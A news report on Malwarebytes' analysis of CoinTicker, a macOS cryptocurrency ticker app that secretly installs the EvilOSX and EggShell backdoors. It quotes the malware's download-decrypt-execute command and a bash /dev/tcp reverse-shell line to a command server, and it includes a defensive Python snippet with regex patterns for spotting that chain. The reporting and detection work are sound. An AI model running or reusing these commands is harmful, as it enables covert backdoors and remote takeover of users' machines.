CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies, is installing two backdoors on Mac computers. According to a blog post from Malwarebytes, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors onto computer systems after download.
The CoinTicker App Behaviors
The blog further explained that the CoinTicker app at first seems to be a legitimate application that could be useful to people who have invested in cryptocurrencies. Once downloaded, the app places an icon in the menu bar that shows the current price of Bitcoin. The app's options let the user change the display to show data about a broad range of cryptocurrencies, such as Bitcoin, Ethereum, and Monero.
This functionality appears to be genuine, but in reality the app is also installing two backdoors known as EvilOSX and EggShell. Because the app behaves like a legitimate program, the backdoors are installed without ever prompting the user for root authentication. When the user launches the app, it downloads and installs components of two different open-source backdoors, EvilOSX and EggShell. The app runs the following shell command to download a custom-compiled version of the EggShell server for macOS:
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py
The first part of the command downloads an encrypted file from a GitHub page belonging to a user named “youarenick” and stores it as a hidden file called .info.enc in /private/tmp/. It then uses OpenSSL to decrypt that file into a hidden Python file called .info.py. Finally, it runs the resulting Python script.
The .info.py script performs several tasks. First, it opens a reverse shell connection to a command-and-control server, using the following command:
nohup bash &> /dev/tcp/188.8.131.52/2280 0>&1
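As an added illustration (not code from the Malwarebytes post or from CoinTicker), the detection logic a defender could run over recorded process command lines to flag the chain described above: a download to a hidden file in /tmp, an OpenSSL decryption of that file, an interpreter executing it, and a bash redirect to /dev/tcp. The sample events, hosts and key are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample of process-execution events, as an EDR or auditd-style
# pipeline would record command lines. The first four mirror the CoinTicker
# pattern with placeholder hosts; the last two are benign controls.
SAMPLE_EVENTS = [
    "nohup curl -k -L -o /tmp/.info.enc https://example.invalid/raw/master/info.enc",
    "openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k PLACEHOLDER",
    "python /tmp/.info.py",
    "nohup bash &> /dev/tcp/203.0.113.10/2280 0>&1",
    "curl -L -o /Users/alice/Downloads/report.pdf https://example.invalid/report.pdf",
    "python /Users/alice/project/main.py",
]

# A dot-file directly under /tmp or /private/tmp (macOS symlinks the two).
HIDDEN_TMP = r"/(?:private/)?tmp/\.[^\s/]+"

RULES = [
    ("download_to_hidden_tmp",
     re.compile(r"\bcurl\b.*\s-o\s+" + HIDDEN_TMP)),
    ("decrypt_hidden_tmp",
     re.compile(r"\bopenssl\s+enc\b.*\s-d\b.*\s-out\s+" + HIDDEN_TMP)),
    ("interpreter_from_hidden_tmp",
     re.compile(r"\b(?:python[0-9.]*|perl|ruby|bash|sh)\s+" + HIDDEN_TMP)),
    ("dev_tcp_reverse_shell",
     re.compile(r"/dev/tcp/[\w.-]+/\d+")),
]

def classify(cmdline: str) -> List[str]:
    """Names of every rule the command line triggers (empty if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events: List[str]) -> List[Dict[str, object]]:
    """Keep only the events that trip at least one rule."""
    return [{"cmdline": e, "rules": classify(e)} for e in events if classify(e)]

def chain_matched(findings: List[Dict[str, object]]) -> bool:
    """True when the full download -> decrypt -> execute chain is present,
    which is far stronger evidence than any single stage alone."""
    seen = {r for f in findings for r in f["rules"]}
    return {"download_to_hidden_tmp", "decrypt_hidden_tmp",
            "interpreter_from_hidden_tmp"} <= seen

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["rules"], "<-", f["cmdline"])
    print("full staging chain observed:", chain_matched(scan(SAMPLE_EVENTS)))
```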
The blog further explained that the attacker's purpose behind this app is not yet known. Since the malware is spread through a cryptocurrency app, however, it seems likely that it is intended to gain access to users' cryptocurrency wallets in order to steal coins.
The app was probably never legitimate, since it is distributed through a domain named coin-sticker.com that was registered only a few months ago, on July 13.
About EvilOSX and EggShell
EvilOSX is malware posted on GitHub that gives attackers a highly customizable attack tool that runs on both older and newer versions of macOS. Anyone can download the project. It is a remote access trojan, a program that can be used to spy on a macOS user by accessing the system's webcam, microphone, and screenshot capability. It also lets attackers download personal files without the victim's knowledge.
EggShell is a post-exploitation tool written in Python. It gives its operator a command-line interface with additional functionality, including uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, privilege escalation, password retrieval, and much more.
The post concluded that the notable thing about CoinTicker is that it requires only normal user permissions; root permissions are not needed. The need for root privileges is usually over-emphasized when discussing malware, and this sample is a classic illustration that malware does not need such privileges to pose a high risk.
Just a few days ago, the McAfee Labs Threat Report for September 2018 found that malware that mines cryptocurrency with a PC's resources grew by 85% in Q2 2018, nearly doubling. McAfee's research also found an increase in malware attacks targeting mobile devices. A growing trend toward mobile adoption has been seen across the sector, as both CoinMarketCap and Binance Info have released apps that give users access to market data on mobile devices. The new Zcash (ZEC) ‘Sapling’ update will reduce the computational power needed for its zk-SNARKs proving system, which will make transactions from phones a reality.
The notoriety and growing real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto-mining malware, software created to mine cryptocurrency illegally, has nearly doubled in the second quarter of the year, and perpetrators could be building malware specifically to target mobile devices.